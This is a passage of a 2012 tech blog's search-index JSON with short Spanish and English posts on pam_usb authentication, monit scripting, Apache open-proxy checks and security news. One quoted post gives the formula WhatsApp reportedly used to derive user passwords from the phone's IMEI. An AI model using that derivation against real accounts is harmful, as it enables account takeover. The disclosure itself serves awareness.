gaussianos.com\n","permalink":"http://karpoke.ignaciocano.com/2012/10/05/recopilacion-de-relojes-matematicos/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl tiempo\u0026hellip; ese bien tan preciado para muchos, tan desperdiciado por\nla mayoría\u0026hellip; Eso que los relojes nos ayudan a medir o controlar a\ndiario.\u003c/p\u003e\n\u003cp\u003eHablemos de relojes. Los hay de muchísimos tipos: de muñeca, de pared,\nanalógicos, digitales, con números arábigos, con números romanos, o\nhasta sin números. Y, evidentemente, los hay con motivos\nfriki-matemáticos. Y de esos son los que vamos a ver a continuación,\nde relojes matemáticos.\u003c/p\u003e","title":"Recopilación de relojes matemáticos"},{"content":" This project is based on the entire ABC’s LOST TV show scripts, 115 episodes in 7 seasons, that I managed to parse from Lostpedia. I also parsed this page with additional information about hidden characters relations.\nMy aim for this project is not (only) to visualize some properties and patterns out of the script but actually to allow to read and enjoy the series in a different way.\nI plan to add new views (will inform through twitter), more aimed to reveal global patterns in the script, and I will include cliffhangers and writing teams information.\nFind more information about Lostalgic in this great article and interview by Greg J. Smith in Creative Applications.\nThis project is dedicated to the Lost writers, to the open culture and, in particular, to the community that built Lostpedia.\n» Santiago Ortiz | intuitionanalytics.com\n","permalink":"http://karpoke.ignaciocano.com/2012/10/05/lostalgic/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis project is based on the entire ABC’s LOST TV show scripts, 115\nepisodes in 7 seasons, that I managed to parse from Lostpedia. I also\nparsed this page with additional information about hidden characters\nrelations.\u003c/p\u003e\n\u003cp\u003eMy aim for this project is not (only) to visualize some properties and\npatterns out of the script but actually to allow to read and enjoy the\nseries in a different way.\u003c/p\u003e\n\u003cp\u003eI plan to add new views (will inform through twitter), more aimed to\nreveal global patterns in the script, and I will include cliffhangers\nand writing teams information.\u003c/p\u003e","title":"Lostalgic"},{"content":" You are looking at the HoneyMap, a real-time world map which visualizes attacks captured by honeypots of the Honeynet Project. Red markers on the map represent attackers, yellow markers are targets (honeypot sensors).\n» Florian Weingarte and Mark Schloesser | HoneyMap / honeynet.org\n","permalink":"http://karpoke.ignaciocano.com/2012/10/01/honeymap/","summary":"\u003cblockquote\u003e\n\u003cp\u003eYou are looking at the HoneyMap, a real-time world map which\nvisualizes attacks captured by honeypots of the Honeynet Project. Red\nmarkers on the map represent attackers, yellow markers are targets\n(honeypot sensors).\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Florian Weingarte and Mark Schloesser | \u003ca href=\"http://map.honeycloud.net/\"\u003eHoneyMap\u003c/a\u003e / \u003ca href=\"http://www.honeynet.org/\"\u003ehoneynet.org\u003c/a\u003e\u003c/p\u003e","title":"HoneyMap"},{"content":"pam_usb es un módulo que permite añadir autenticación hardware utilizando unidades de almacenamiento extraíbles \u0026ldquo;normales\u0026rdquo;, como memorias USB, tarjetas SD/MMC, etc. Mediante pamusb podemos especificar que se ejecuten diversas acciones cuando reconoce el dispositivo conectado, como por ejemplo iniciar sesión sin tener que introducir la contraseña o desactivar el salvapantallas, por lo que se puede utilizar para implantar un sistema de autenticación en dos pasos (2FA).\nSirve cualquier USB, ya que el módulo no modifica su contenido, sino que comprueba el UUID, el número de serie, el fabricante y el modelo, por lo que, aunque se copie, no se podrá suplantar fácilmente.\nInstalación Instalamos el módulo:\n$ api libpam-usb pamusb-tools Configuración USBs Una vez conectado el USB que pensamos utilizar, aunque no hace falta que esté montado, lo añadimos al archivo de configuración /etc/pamusb.conf (podemos asignarle cualquier nombre):\n$ sudo pamusb-conf --add-device myusb Please select the device you wish to add. * Using \u0026#34;Kingston Aurum (136C0932618F)\u0026#34; (only option) Which volume would you like to use for storing data ? * Using \u0026#34;/dev/sdb1 (UUID: 37AD-8A2F)\u0026#34; (only option) Name : myusb Vendor : Kingston Model : Aurum Serial : 136C0932618F UUID : 37AD-8A2F Save to /etc/pamusb.conf ? [Y/n] Y Done. Deberemos repetir el proceso para cada USB que queramos utilizar.\nUsuarios El siguiente paso es configurar los usuarios que queremos que se autentiquen:\n$ sudo pamusb-conf --add-user myuser Which device would you like to use for authentication ? * Using \u0026#34;myusb\u0026#34; (only option) User : myuser Device : myusb Save to /etc/pamusb.conf ? [Y/n] Y Done. Comprobación Comprobamos la configuración, todavía con el USB conectado:\n$ sudo pamusb-check myuser * Authentication request for user \u0026#34;m\u0026#34; (pamusb-check) * Device \u0026#34;myusb\u0026#34; is connected (good). * Performing one time pad verification... * Regenerating new pads... * Access granted. Si desconectamos el USB y volvemos a probar:\n$ sudo pamusb-check myuser * Authentication request for user \u0026#34;myuser\u0026#34; (pamusb-check) * Device \u0026#34;myusb\u0026#34; is not connected. * Access denied. Módulo PAM Para incluir pam_usb en el proceso de autenticación del sistema, deberemos editar el fichero /etc/pam.d/common-auth y añadir la siguiente linea:\nauth sufficient pam_usb.so antes de la línea:\nauth required pam_unix.so nullok_secure La opción sufficient permite autenticar al usuario si el USB conectado es correcto, y si no lo es continúa con el proceso de autenticación, es decir, pide la contraseña. Si en su lugar ponemos required se necesitarán ambos, USB y contraseña, para acceder al sistema.\nSi sólo queremos utilizar este sistema de autenticación para algún módulo concreto, en lugar de usar el ficheo common-auth editamos el fichero correspondiente, por ejemplo lightdm, sshd, sudo, etc.\nNo es necesario reiniciar para que los cambios tengan efecto. Con el USB desconectamos hacemos la siguiente prueba:\n$ su myuser * pam_usb v0.5.0 * Authentication request for user \u0026#34;myuser\u0026#34; (su) * Device \u0026#34;myusb\u0026#34; is not connected. * Access denied. Contraseña: Lo conectamos y volvemos a probar:\n$ su myser * pam_usb v0.5.0 * Authentication request for user \u0026#34;myuser\u0026#34; (su) * Device \u0026#34;myusb\u0026#34; is connected (good). * Performing one time pad verification... * Access granted. Agente Si queremos que se ejecute un comando cuando detecte que se ha conectado el USB, editamos el fichero /etc/pamusb.conf, esta vez mediante un editor de texto, y añadimos las siguientes líneas en la sección de configuración de usuario. Hay un ejemplo incluído como el siguiente, aunque está comentado, y lo que hace es activar o desactivar el salvapantallas:\nmyusb gnome-screensaver-command --lock gnome-screensaver-command --deactivate Es posible que necesitemos añadir pamusb-agent para que se ejecute al inicio, aunque con Ubuntu Precise Pangolin no me ha hecho falta. Si tenemos un entorno de escritorio, podemos incluirlo a través del menú de Aplicaciones al inicio.\nSi queremos hacerlo desde el terminal, dependerá de si usamos init o upstart.\nUpstart Si usamos el sistema upstart, para hacer que se ejecute al inicio, creamos el archivo /etc/init/pamusb-agent.conf:\n# pamusb-agent - pam_usb event handler # # pamusb-agent is in charge of executing commands upon USB device insertion # (once authenticated through pam_usb) and removal. description \u0026#34;pamusb-agent background daemon\u0026#34; start on runlevel [2345] stop on runlevel [!2345] expect fork respawn exec /usr/bin/pamusb-agent Mediante respawn especificamos que se reinicie el proceso si termina de forma inesperada.\nVamos al directorio /etc/init.d y creamos el siguiente enlace simbólico:\n$ sudo ln -s /lib/init/upstart-job pamusb-agent init Si utilizamos init, añadimos el siguiente script en el directorio /etc/init.d:\n#!/usr/bin/env bash /usr/bin/pamusb-agent Le damos permisos de ejecución:\n$ sudo chmod +x /etc/init.d/pamusb-agent Lo añadimos al inicio:\n$ sudo update-rc.d pamusb-agent defaults update-rc.d: warning: /etc/init.d/pamusb-agent missing LSB information update-rc.d: see Adding system startup for /etc/init.d/pamusb-agent ... /etc/rc0.d/K20pamusb-agent -\u0026gt; ../init.d/pamusb-agent /etc/rc1.d/K20pamusb-agent -\u0026gt; ../init.d/pamusb-agent /etc/rc6.d/K20pamusb-agent -\u0026gt; ../init.d/pamusb-agent /etc/rc2.d/S20pamusb-agent -\u0026gt; ../init.d/pamusb-agent /etc/rc3.d/S20pamusb-agent -\u0026gt; ../init.d/pamusb-agent /etc/rc4.d/S20pamusb-agent -\u0026gt; ../init.d/pamusb-agent /etc/rc5.d/S20pamusb-agent -\u0026gt; ../init.d/pamusb-agent Para activarlo sin tener que reiniciar, ejecutamos:\n$ sudo service pamusb-agent start Referencias » pam_usb » Upstart\n","permalink":"http://karpoke.ignaciocano.com/2012/09/30/autenticacion-hardware-mediante-un-usb/","summary":"\u003cp\u003e\u003ca href=\"http://pamusb.org/\"\u003epam_usb\u003c/a\u003e es un módulo que permite añadir autenticación hardware\nutilizando unidades de almacenamiento extraíbles \u0026ldquo;normales\u0026rdquo;, como\nmemorias USB, tarjetas SD/MMC, etc. Mediante \u003ccode\u003epamusb\u003c/code\u003e podemos\nespecificar que se ejecuten diversas acciones cuando reconoce el\ndispositivo conectado, como por ejemplo iniciar sesión sin tener que\nintroducir la contraseña o desactivar el salvapantallas, por lo que se\npuede utilizar para implantar un \u003ca href=\"/2011/08/05/servicio-de-ssh-con-sistema-de-verificacion-en-dos-pasos-de-google-en-ubuntu-natty-narwhal/\"\u003esistema de autenticación en dos pasos\n(2FA)\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eSirve cualquier USB, ya que el módulo no modifica su contenido, sino que\ncomprueba el UUID, el número de serie, el fabricante y el modelo, por lo\nque, aunque se copie, no se podrá suplantar fácilmente.\u003c/p\u003e","title":"Autenticación hardware mediante un USB"},{"content":" A major security vulnerability has been discovered in some TouchWiz-based Samsung smartphones, including the Galaxy S2 and certain Galaxy S3 models on older firmware. The bug was first demonstrated days ago by security researcher Ravi Borgaonkar at the Ekoparty security conference. It involves the use of a single line of code in a malicious web page to immediately trigger a factory reset without prompting the user, or allowing them to cancel the process. Even more serious is the possibility that this could be paired with a similar glitch to render the user’s SIM card inoperable. And as the malicious code is in URI form, it can also be delivered via NFC or QR code.\n» USSD vulnerability test » Alex Dobie | androidcentral.com\n","permalink":"http://karpoke.ignaciocano.com/2012/09/26/major-security-vulnerability-in-some-samsung-phones-could-trigger-factory-reset-via-web-page/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA major security vulnerability has been discovered in some\nTouchWiz-based Samsung smartphones, including the Galaxy S2 and\ncertain Galaxy S3 models on older firmware. The bug was first\ndemonstrated days ago by security researcher Ravi Borgaonkar at the\nEkoparty security conference. It involves the use of a single line of\ncode in a malicious web page to immediately trigger a factory reset\nwithout prompting the user, or allowing them to cancel the process.\nEven more serious is the possibility that this could be paired with a\nsimilar glitch to render the user’s SIM card inoperable. And as the\nmalicious code is in URI form, it can also be delivered via NFC or QR\ncode.\u003c/p\u003e","title":"Major security vulnerability in some Samsung phones could trigger factory reset via web page"},{"content":" In the world of hackers, the kind of answers you get to your technical questions depends as much on the way you ask the questions as on the difficulty of developing the answer. This guide will teach you how to ask questions in a way more likely to get you a satisfactory answer.\nNow that use of open source has become widespread, you can often get as good answers from other, more experienced users as from hackers. This is a Good Thing; users tend to be just a little bit more tolerant of the kind of failures newbies often have. Still, treating experienced users like hackers in the ways we recommend here will generally be the most effective way to get useful answers out of them, too.\nThe first thing to understand is that hackers actually like hard problems and good, thought-provoking questions about them. If we didn’t, we wouldn’t be here. If you give us an interesting question to chew on we’ll be grateful to you; good questions are a stimulus and a gift. Good questions help us develop our understanding, and often reveal problems we might not have noticed or thought about otherwise. Among hackers, ”Good question!” is a strong and sincere compliment.\n» Eric Steven Raymond | catb.org\n","permalink":"http://karpoke.ignaciocano.com/2012/09/26/how-to-ask-questions-the-smart-way/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn the world of hackers, the kind of answers you get to your technical\nquestions depends as much on the way you ask the questions as on the\ndifficulty of developing the answer. This guide will teach you how to ask\nquestions in a way more likely to get you a satisfactory answer.\u003c/p\u003e\n\u003cp\u003eNow that use of open source has become widespread, you can often get as good\nanswers from other, more experienced users as from hackers.  This is a Good\nThing; users tend to be just a little bit more tolerant of the kind of\nfailures newbies often have. Still, treating experienced users like hackers\nin the ways we recommend here will generally be the most effective way to get\nuseful answers out of them, too.\u003c/p\u003e","title":"How To Ask Questions The Smart Way"},{"content":"monit es un herramienta para monitorizar procesos, ficheros, directorios y sistemas de ficheros, que permite enviar alertas cuando suceden eventos tales como que un proceso no arranca, se incrementa la carga del sistema o el uso de memoria por encima de un umbral determinado, se modifican ficheros o directorios, etc.\nEl problema es que, por ahora, no permite controlar que el tamaño de un directorio, es decir, de los ficheros contenidos en él, supere cierto valor. Sin embargo, podemos conseguir este resultado utilizando un script que se ejecute de forma periódica y que modifique la fecha de un fichero concreto mientras el tamaño del directorio sea correcto. Este fichero de control nos servirá para saber cuándo se ha superado el limite.\nPor ejemplo, vamos a suponer que queremos monitorizar el directorio /var/www/uploads y que monit nos avise si supera los 2 GB. Para saber el tamaño que ocupa el directorio ejecutamos:\n$ du -s /var/www/uploads | awk \u0026#39;{print $1}\u0026#39; # el tamaño está en KB Para comprobar si supera el umbral, podemos ejecutar un script como el siguiente:\n#!/usr/bin/env bash # $1: directory # $2: size threshold in MB # $3: control filename in monit configuration file [ $# -lt 3 ] \u0026amp;\u0026amp; exit 1 [ ! -r \u0026#34;$1\u0026#34; ] \u0026amp;\u0026amp; exit 1 declare -i threshold=$(($2*1024)) # MB to KB declare -i size=$(du -s \u0026#34;$1\u0026#34; | awk \u0026#39;{print $1}\u0026#39;) # KB if [ $size -lt $threshold ]; then touch \u0026#34;$3\u0026#34;; fi Lo ejecutamos y comprobamos que funciona correctamente:\n$ sudo ./test_directory_size.sh /var/www/uploads 2000 /var/tmp/monit_dir_uploads $ ls /var/tmp/monit_dir_uploads -rw-r--r-- 1 root root 0 2012-07-22 14:48 /var/tmp/monit_dir_uploads Lo añadimos al cron, por ejemplo cada 10 minutos, y le pasamos los valores adecuados:\n$ sudo crontab -e _/10 _ * _ _ /root/scripts/test_directory_size.sh /var/www/uploads 2000 /var/tmp/monit_dir_uploads \u0026gt; /dev/null 2\u0026gt;\u0026amp;1 La frecuencia dependerá de la urgencia que le asignemos a este evento y las consecuencias que tenga el hecho de que ocurra, así como de otros factores que limiten su aparición.\nAhora sólo queda añadir la configuración de monit en el fichero /etc/monit/conf.d/server.conf. Hay que tener en cuenta el tiempo que hemos puesto en el cron a la hora de comprobar la fecha de modificación del fichero.\ncheck file monit_dir_uploads with path /var/tmp/monit_dir_uploads if timestamp \u0026gt; 15 minutes then alert Reiniciamos monit para que los cambios tengan efecto.\nCuando ocurra que el tamaño del directorio supere el umbral, y por tanto el script deje de actualizar el fichero de control, nos llegará un aviso como el siguiente:\nTimestamp failed Service monit_dir_uploads Date: Sun, 22 Jul 2012 15:08:17 +0200 Action: alert Host: localhost Description: timestamp test failed for /var/tmp/monit_dir_uploads Your faithful employee, monit ","permalink":"http://karpoke.ignaciocano.com/2012/09/22/monitorizar-el-tamano-de-un-directorio-con-monit/","summary":"\u003cp\u003e\u003ccode\u003emonit\u003c/code\u003e es un herramienta para monitorizar procesos, ficheros,\ndirectorios y sistemas de ficheros, que permite enviar alertas cuando\nsuceden eventos tales como que un proceso no arranca, se incrementa la\ncarga del sistema o el uso de memoria por encima de un umbral\ndeterminado, se modifican ficheros o directorios, etc.\u003c/p\u003e\n\u003cp\u003eEl problema es que, por ahora, no permite controlar que el tamaño de un\ndirectorio, es decir, de los ficheros contenidos en él, supere cierto\nvalor. Sin embargo, podemos \u003ca href=\"https://lists.gnu.org/archive/html/monit-general/2009-01/msg00023.html\"\u003econseguir este resultado\u003c/a\u003e utilizando un\n\u003cem\u003escript\u003c/em\u003e que se ejecute de forma periódica y que modifique la fecha de\nun fichero concreto mientras el tamaño del directorio sea correcto. Este\nfichero de control nos servirá para saber cuándo se ha superado el\nlimite.\u003c/p\u003e","title":"Monitorizar el tamaño de un directorio con monit"},{"content":"Revistando logs de Apache, he visto que tenía algunas entradas del tipo:\n93.174.93.52 - - [18/Sep/2012:02:23:11 +0200] \u0026#34;GET http://myproxylists.com/my-http-headers HTTP/1.1\u0026#34; 404 1046 \u0026#34;-\u0026#34; \u0026#34;Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)\u0026#34; 93.174.93.52 - - [20/Sep/2012:08:21:08 +0200] \u0026#34;GET http://myproxylists.com/my-http-headers HTTP/1.1\u0026#34; 404 1046 \u0026#34;-\u0026#34; \u0026#34;Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)\u0026#34; Este suele ser el resultado de peticiones maliciosas que buscan encontrar servidores proxy abiertos. Si encontramos entradas de este tipo, lo primero que deberíamos hacer es comprobar que tenemos configurado el servidor correctamente, para no permitir hacer de proxy a peticiones de anónimos. De hecho, si no necesitamos un servidor proxy, lo mejor es asegurarnos que la directiva ProxyRequests no está inicializada a on.\nSi el servidor está bien configurado, este tipo de peticiones fallarán, y se verá un código 404 en el log. Un código 200 no significa necesariamente que esté mal configurado. Si no hemos configurado el nombre del servidor, Apache aceptará peticiones de URLs absolutas, ya que no tiene forma de saber bajo qué nombres de dominio se ejecuta. Para prevenirlo, podemos utilizar las directivas ServerName y ServerAlias para que las peticiones de otros dominios sean rechazadas.\nSi queremos comprobar si nuestro servidor está haciendo de proxy podemos ejecutar:\n$ telnet localhost 80 GET http://www.google.com HTTP/1.1 Host: www.google.com Referencias » Apache Server Frequently Asked Questions » HTTP Wiki - Proxy abuse\n","permalink":"http://karpoke.ignaciocano.com/2012/09/21/comprobar-que-no-tenemos-configurado-apache-como-un-proxy-abierto/","summary":"\u003cp\u003eRevistando \u003cem\u003elogs\u003c/em\u003e de Apache, he visto que tenía algunas entradas del\ntipo:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e93.174.93.52 - - [18/Sep/2012:02:23:11 +0200] \u0026#34;GET http://myproxylists.com/my-http-headers HTTP/1.1\u0026#34; 404 1046 \u0026#34;-\u0026#34; \u0026#34;Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)\u0026#34;\n93.174.93.52 - - [20/Sep/2012:08:21:08 +0200] \u0026#34;GET http://myproxylists.com/my-http-headers HTTP/1.1\u0026#34; 404 1046 \u0026#34;-\u0026#34; \u0026#34;Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)\u0026#34;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEste suele ser el resultado de peticiones maliciosas que buscan\nencontrar servidores \u003cem\u003eproxy\u003c/em\u003e abiertos. Si encontramos entradas de este\ntipo, lo primero que deberíamos hacer es comprobar que tenemos\nconfigurado el servidor correctamente, para no permitir hacer de \u003cem\u003eproxy\u003c/em\u003e\na peticiones de anónimos. De hecho, si no necesitamos un servidor\n\u003cem\u003eproxy\u003c/em\u003e, lo mejor es asegurarnos que la directiva \u003ccode\u003eProxyRequests\u003c/code\u003e no\nestá inicializada a \u003ccode\u003eon\u003c/code\u003e.\u003c/p\u003e","title":"Comprobar que no tenemos configurado Apache como un proxy abierto"},{"content":"» Matthew Inman | theoatmeal.com\n","permalink":"http://karpoke.ignaciocano.com/2012/09/20/my-dog-the-paradox/","summary":"\u003cp\u003e» Matthew Inman | \u003ca href=\"http://theoatmeal.com/comics/dog_paradox\"\u003etheoatmeal.com\u003c/a\u003e\u003c/p\u003e","title":"My dog: the paradox"},{"content":" Dear Sen. Rockefeller,\nI am a cyber expert. I invented a key technology known as ”IPS” that is a standard part of network defense. I invented hacking techniques like ”sidejacking” that are a standard part of network offense. I am a coder who has written a million lines of production code. I am a ”pentester” who has performed simulated attacks that confirm your worst nightmares about power-grid blackouts and financial meltdowns.\nYour letter [*] was na¯ve. There is no such thing as ”best” practice, because there is no such thing as ”adequate” practice. The Fortune 500 has not figured out how to stop Chinese hackers from breaking into web browsers, or how to separate code from data injected into websites, or how to stop an inadvertent connection between a secured and unsecured network. This has allowed me to hack (in tests) into Fortune 500 companies, even those that follow the very best of ”best practice”.\n» Robert David Graham | erratasec.blogspot.com\n","permalink":"http://karpoke.ignaciocano.com/2012/09/20/an-open-letter-to-senator-rockefeller/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDear Sen. Rockefeller,\u003c/p\u003e\n\u003cp\u003eI am a cyber expert. I invented a key technology known as ”IPS” that\nis a standard part of network defense. I invented hacking techniques\nlike ”sidejacking” that are a standard part of network offense. I am a\ncoder who has written a million lines of production code. I am a\n”pentester” who has performed simulated attacks that confirm your\nworst nightmares about power-grid blackouts and financial meltdowns.\u003c/p\u003e","title":"An open letter to Senator Rockefeller"},{"content":" Cosmo is huge ” 6 foot 7 and 220 pounds the last time he was weighed, at a detention facility in Long Beach, California on June 26. And yet he’s getting bigger, because Cosmo ” also known as Cosmo the God, the social-engineering mastermind who weaseled his way past security systems at Amazon, Apple, AT\u0026amp;T, PayPal, AOL, Netflix, Network Solutions, and Microsoft ” is just 15 years old.\nHe turns 16 next March, and he may very well do so inside a prison cell.\nCosmo was arrested along with dozens of others in a recent multi-state FBI sting targeting credit card fraud. It is the day before his court date, but he doesn’t know which task force is investigating him or the name of his public defender. He doesn’t even know what he’s been charged with. It’s tough to narrow it down; he freely admits to participation in a wide array of crimes.\n» Mat Honan | wired.com\n","permalink":"http://karpoke.ignaciocano.com/2012/09/16/cosmo-the-hacker-god-who-fell-to-earth/","summary":"\u003cblockquote\u003e\n\u003cp\u003eCosmo is huge ” 6 foot 7 and 220 pounds the last time he was weighed,\nat a detention facility in Long Beach, California on June 26. And yet\nhe’s getting bigger, because Cosmo ” also known as Cosmo the God, the\nsocial-engineering mastermind who weaseled his way past security\nsystems at Amazon, Apple, AT\u0026amp;T, PayPal, AOL, Netflix, Network\nSolutions, and Microsoft ” is just 15 years old.\u003c/p\u003e\n\u003cp\u003eHe turns 16 next March, and he may very well do so inside a prison\ncell.\u003c/p\u003e","title":"Cosmo, the Hacker ’God’ Who Fell to Earth"},{"content":" It’s September of an election year, and people are drawing lines, taking stands, and proclaiming their political beliefs. Even the lurkers, who brag that they ”never post political stuff on Facebook” find their trigger fingers twitching over the ”share” button. The internet is a battlefield, and you simply can’t get around online without being drawn into a shootout from time to time. When that happens, these tips will keep you knocking down opponents without losing your cool or becoming a troll.\n» Jesse Nivens | lifehacker.com\n","permalink":"http://karpoke.ignaciocano.com/2012/09/15/how-to-argue-on-the-internet-without-becoming-a-troll/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIt’s September of an election year, and people are drawing lines,\ntaking stands, and proclaiming their political beliefs. Even the\nlurkers, who brag that they ”never post political stuff on Facebook”\nfind their trigger fingers twitching over the ”share” button. The\ninternet is a battlefield, and you simply can’t get around online\nwithout being drawn into a shootout from time to time. When that\nhappens, these tips will keep you knocking down opponents without\nlosing your cool or becoming a troll.\u003c/p\u003e","title":"How to Argue on the Internet Without Becoming a Troll"},{"content":" Computational Engineers at the University of Southampton have built a supercomputer from 64 Raspberry Pi computers and Lego.\nThe team, led by Professor Simon Cox, consisted of Richard Boardman, Andy Everett, Steven Johnston, Gereon Kaiping, Neil O’Brien, Mark Scott and Oz Parchment, along with Professor Cox’s son James Cox (aged 6) who provided specialist support on Lego and system testing.\nProfessor Cox comments: ”As soon as we were able to source sufficient Raspberry Pi computers we wanted to see if it was possible to link them together into a supercomputer. We installed and built all of the necessary software on the Pi starting from a standard Debian Wheezy system image and we have published a guide so you can build your own supercomputer.”\n» southampton.ac.uk » Simon Cox | Steps to make a Raspberry Pi Supercomputer\n","permalink":"http://karpoke.ignaciocano.com/2012/09/13/southampton-engineers-a-raspberry-pi-supercomputer/","summary":"\u003cblockquote\u003e\n\u003cp\u003eComputational Engineers at the University of Southampton have built a\nsupercomputer from 64 Raspberry Pi computers and Lego.\u003c/p\u003e\n\u003cp\u003eThe team, led by Professor Simon Cox, consisted of Richard Boardman, Andy\nEverett, Steven Johnston, Gereon Kaiping, Neil O’Brien, Mark Scott and Oz\nParchment, along with Professor Cox’s son James Cox (aged 6) who provided\nspecialist support on Lego and system testing.\u003c/p\u003e\n\u003cp\u003eProfessor Cox comments: ”As soon as we were able to source sufficient\nRaspberry Pi computers we wanted to see if it was possible to link them\ntogether into a supercomputer. We installed and built all of the necessary\nsoftware on the Pi starting from a standard Debian Wheezy system image and we\nhave published a guide so you can build your own supercomputer.”\u003c/p\u003e","title":"Southampton engineers a Raspberry Pi Supercomputer"},{"content":" As software developers, we develop habits that allow us to build products that work and do not fail under stress. Every software developer knows what an ”off-by-one” error is, and like the Karate Kid, we train extensively so we can avoid those traps. We learn how to avoid these and other similar software problems and we sharpen our skills to find logic errors.\nAs we mature as developers, finding logic errors and incomplete solutions becomes our way of life. It defines us.\nBut our engineering strength is also our social weakness. Countless times as engineers you will find yourself interrupting someone telling a story, an anecdote or a joke to correct a false assumption, provide an extra fact that the narrator overlooked, give a bigger perspective on the problem or point out that the joke premise is actually flawed.\nYou can identify this behavior because the person interrupting usually starts with the phrase ”Well, actually\u0026hellip;”.\n» Miguel de Icaza | tirania.org\n","permalink":"http://karpoke.ignaciocano.com/2012/09/10/well-actually/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAs software developers, we develop habits that allow us to build\nproducts that work and do not fail under stress. Every software\ndeveloper knows what an ”off-by-one” error is, and like the Karate\nKid, we train extensively so we can avoid those traps. We learn how to\navoid these and other similar software problems and we sharpen our\nskills to find logic errors.\u003c/p\u003e\n\u003cp\u003eAs we mature as developers, finding logic errors and incomplete\nsolutions becomes our way of life. It defines us.\u003c/p\u003e","title":"Well, Actually"},{"content":" This proposal adds new elements and attribute to [HTML5] to enable different sources of images based on browser and display characteristics. The proposal addresses multiple use cases such as images used in responsive web designs and different images needed for high density displays.\nThis proposal allows content authors to provide user agents with the information they need to select the best image source. The current img element only allows for a single source of an image, but there are numerous use cases where document authors need to define different image sources depending on the factors such as the design, size resolution, and display density.\nThe best image source may be an image sized appropriately for the display size or pixel density. Or the best image source may be a different version of an image that has been modified by the author to be suitable for a particular use (see: art direction use case).\n» w3.org\n","permalink":"http://karpoke.ignaciocano.com/2012/09/07/html-responsive-images-extension/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis proposal adds new elements and attribute to [HTML5] to enable\ndifferent sources of images based on browser and display\ncharacteristics. The proposal addresses multiple use cases such as\nimages used in responsive web designs and different images needed for\nhigh density displays.\u003c/p\u003e\n\u003cp\u003eThis proposal allows content authors to provide user agents with the\ninformation they need to select the best image source. The current img\nelement only allows for a single source of an image, but there are\nnumerous use cases where document authors need to define different\nimage sources depending on the factors such as the design, size\nresolution, and display density.\u003c/p\u003e","title":"HTML Responsive Images Extension"},{"content":" As you probably already heard in recent news, 1,000,001 Apple UDID’s were leaked. It’s unfortunate that so many apps use UDID’s to identify users since it’s extremely insecure.\nThis brings me to WhatsApp, a free messaging service, used by millions of people. Their system runs on a modified version of XMPP (Extensible Messaging and Presence Protocol). There is nothing wrong with using XMPP, but there is a problem in how WhatsApp handle authentication.\nIf you installed WhatsApp on an Android device for example, your password is likely to be an inverse of your phones IMEI number with an MD5 cryptographic hash thrown on top of it (without salt).\nmd5(strrev(’your-imei-goes-here’)) » Sam Granger | samgranger.com\n","permalink":"http://karpoke.ignaciocano.com/2012/09/07/whatsapp-is-using-imei-numbers-as-passwords/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAs you probably already heard in recent news, 1,000,001 Apple UDID’s\nwere leaked. It’s unfortunate that so many apps use UDID’s to identify\nusers since it’s extremely insecure.\u003c/p\u003e\n\u003cp\u003eThis brings me to WhatsApp, a free messaging service, used by millions\nof people. Their system runs on a modified version of XMPP (Extensible\nMessaging and Presence Protocol). There is nothing wrong with using\nXMPP, but there is a problem in how WhatsApp handle authentication.\u003c/p\u003e","title":"WhatsApp is using IMEI numbers as passwords"},{"content":" A co-worker watched me type the other day and noticed that I use certain Unix commands for purposes other than they are intended. Yes, I abuse Unix commands.\n» Tom Limoncelli | everythingsysadmin.com\n","permalink":"http://karpoke.ignaciocano.com/2012/09/06/4-unix-commands-i-abuse-every-day/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA co-worker watched me type the other day and noticed that I use\ncertain Unix commands for purposes other than they are intended. Yes,\nI abuse Unix commands.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Tom Limoncelli | \u003ca href=\"http://everythingsysadmin.com/2012/09/unorthodoxunix.html\"\u003eeverythingsysadmin.com\u003c/a\u003e\u003c/p\u003e","title":"4 unix commands I abuse every day"},{"content":"Tengo una Raspbmc instalada en la Raspberry Pi. Al utilizar aptitude para instalar cualquier paquete o actualizar el sistema, recibo el siguiente error:\n$ sudo aptitude update [ ERR] Leyendo la información de estado E: No se pudo abrir el fichero de bloqueo \u0026#34;/var/lock/aptitude\u0026#34; - open (2: No existe el fichero o el directorio) W: No se pudo bloquear el fichero de almacén. Esto significa habitualmente que dpkg u otra herramienta apt está instalando paquetes. Se abrirá en modo de sólo lectura, ¡se PERDERÁN todos los cambios que realice al estado de los paquetes! En realidad, lo que sucede es que /var/lock es un enlace simbólico que apunta a /run/lock, que no existe, y de ahí que no lo encuentre. Creando el directorio en cuestión, se soluciona el problema:\n$ sudo mkdir /run/lock ","permalink":"http://karpoke.ignaciocano.com/2012/09/06/solucionado-el-error-no-se-pudo-abrir-el-fichero-de-bloqueo-varlockaptitude-al-actualizar-raspbmc/","summary":"\u003cp\u003eTengo una Raspbmc instalada en la Raspberry Pi. Al utilizar \u003ccode\u003eaptitude\u003c/code\u003e\npara instalar cualquier paquete o actualizar el sistema, recibo el\nsiguiente error:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo aptitude update\n[ ERR] Leyendo la información de estado\nE: No se pudo abrir el fichero de bloqueo \u0026#34;/var/lock/aptitude\u0026#34; - open (2: No existe el fichero o el directorio)\nW: No se pudo bloquear el fichero de almacén. Esto significa habitualmente que dpkg u otra 